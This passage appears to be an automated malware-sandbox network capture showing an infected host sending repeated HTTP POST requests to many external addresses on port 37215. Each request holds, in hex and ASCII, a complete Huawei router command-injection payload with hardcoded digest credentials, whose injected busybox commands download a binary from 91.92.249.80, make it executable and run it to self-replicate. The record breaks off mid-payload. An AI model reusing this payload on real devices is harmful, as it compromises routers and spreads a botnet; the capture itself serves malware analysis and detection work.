                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2001192.168.2.235397041.153.162.21637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593283892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2002192.168.2.2355978197.220.156.13937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593290091 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2003192.168.2.2344054157.241.205.10037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593292952 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2004192.168.2.2360150157.45.138.2437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.593363047 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2005192.168.2.2342558177.37.163.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594173908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2006192.168.2.2338054197.40.154.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594229937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2007192.168.2.2350134157.215.43.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594276905 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2008192.168.2.2337938157.73.233.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594327927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2009192.168.2.2349196157.107.251.19937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594383955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2010192.168.2.235385841.135.10.17037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.594429016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 